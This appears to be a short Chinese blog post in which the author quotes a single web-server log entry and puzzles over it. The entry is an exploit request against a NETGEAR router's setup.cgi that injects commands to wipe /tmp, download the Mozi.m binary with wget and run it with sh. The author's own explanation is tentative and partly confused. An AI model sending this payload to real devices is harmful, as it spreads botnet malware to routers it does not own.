weblog中出現這段記錄:
110.156.98.127 - - [22/Aug/2020:14:56:53 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 207 "-" "-"
利用其中的關鍵字 netgear.cfg 拿去餵狗, 得知這是一家美國的 NETGEAR 的網路路由器, 從它的動作來看大概是利用路由器的漏洞進行遠端指令執行, 去下載自身機器的 Mozi.m ?? 再執行自己的網頁 currentsetting.htm ?? 真搞不懂它在幹啥...
沒有留言:
張貼留言